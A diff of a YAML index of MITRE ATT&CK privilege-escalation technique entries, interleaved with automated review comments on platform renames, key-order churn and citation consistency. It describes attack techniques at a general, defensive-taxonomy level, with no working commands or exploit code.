+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
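Review bot: the new citation key `AWS RE:Inforce Threat Detection 2024` contains a colon. YAML accepts it as a plain scalar because no space follows the colon, but the `(Citation: ...)` resolver that links description tags to `external_references` has to match the key verbatim; if it splits on `:` or normalises keys, the inline tag added to this description will not resolve. Rendering T1484.002 once after the change would settle it.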
@@ -16253,9 +16518,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
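Review bot: `x_mitre_platforms` for T1484.002 drops `Azure AD` and `SaaS` in favour of `Identity Provider`. That is a change of platform vocabulary, not of scope, so any consumer that filters techniques by the old platform strings will silently lose this technique; if per-platform index files are derived from this YAML they need to be regenerated against the new names, or given a mapping from the old ones, in the same change. The `x_mitre_version` bump to `2.1` matches the description edit in the previous hunk.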
@@ -16272,6 +16536,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16305,7 +16573,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16461,31 +16728,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
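Review bot: this hunk for T1053.003 is almost entirely a key reorder: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted from the top of the object and re-added with identical values at the bottom in a later hunk, and the only substantive change is the `modified` timestamp. Emitting objects with a stable key order in the generator (or sorting keys before dumping) would keep future diffs down to the lines that actually change.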
@@ -16502,6 +16749,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16512,9 +16760,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16522,13 +16774,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16558,6 +16826,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16568,6 +16837,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16576,13 +16846,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
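Review bot: `x_mitre_platforms` for T1098.003 replaces `Office 365`, `Google Workspace` and `Azure AD` with `Office Suite` and `Identity Provider`. Anything that selects techniques by the old platform strings, per-platform index generation included, will drop this technique unless it is updated to the new vocabulary; make that update in the same PR so the derived indexes do not go stale. The `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines added above are the same values removed from the end of the object in the next hunk, so that part is a reorder only.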
@@ -16624,9 +16894,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16694,19 +16961,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16722,8 +16988,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16737,7 +17003,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16763,6 +17029,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
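Review bot: the new `Hexacorn DLL Hijacking` reference is anchored by the `(Citation: Hexacorn DLL Hijacking)` tag added to the description, so it resolves. While this reference list is being touched, the neighbouring unchanged entry `Microsoft. (, May 23). Microsoft Security Advisory 2269637.` has an empty year; it is upstream text, so it will be re-emitted on every sync until it is fixed there.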
@@ -16790,12 +17060,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16821,7 +17090,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16863,7 +17132,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -16941,11 +17209,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17025,7 +17292,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
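Review bot: the new T1098.007 entry has no `identifier:` line, while sibling entries such as T1053.005, T1548.002 and T1574.001 carry `identifier: <id>` immediately before `atomic_tests: []`; other entries (T1037, T1543, T1574.014) omit it, so the file is already inconsistent, but a new entry should follow whichever form the index consumer relies on. Add `identifier: T1098.007` if the generator reads that key rather than the map key. `x_mitre_detection: ''` is empty and `atomic_tests: []` means no test is indexed yet; both are expected for a technique created in August 2024, but a line in the commit message would stop anyone reading the empty list as a generation bug.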
@@ -17048,7 +17385,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17096,8 +17433,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
@@ -17129,7 +17464,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17184,13 +17519,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17251,9 +17584,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17262,7 +17595,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17315,7 +17647,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17336,12 +17668,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17444,7 +17775,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17544,12 +17874,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17562,7 +17891,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17575,7 +17903,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17605,7 +17932,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
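Review bot: consider having the generator emit keys in a stable order (sorted, or the upstream object order). The only substantive change across the three T1547.009 hunks is the `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0; the removal of that key and of `x_mitre_modified_by_ref` near the top and their re-insertion after `object_marking_refs` is key-order churn, and the same churn inflates the T1484.001 and T1078.001 hunks below.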
@@ -17632,7 +17960,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17658,13 +17986,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
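Review bot: `x_mitre_attack_spec_version: 2.1.0` is dropped from T1547.005 and, unlike T1547.009 above, nothing re-adds it in the visible hunks; T1546.005, T1546.012, T1055.013, T1574.005, T1055.004, T1546.009, T1055.002 and T1547.015 below are treated the same way. Confirm these techniques still carry a spec version somewhere in their entry after regeneration, since a consumer that filters or sorts on that field would otherwise skip them while the techniques bumped to 3.2.0 keep it.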
@@ -17741,12 +18067,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17765,6 +18090,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -17772,7 +18098,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -17792,34 +18117,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
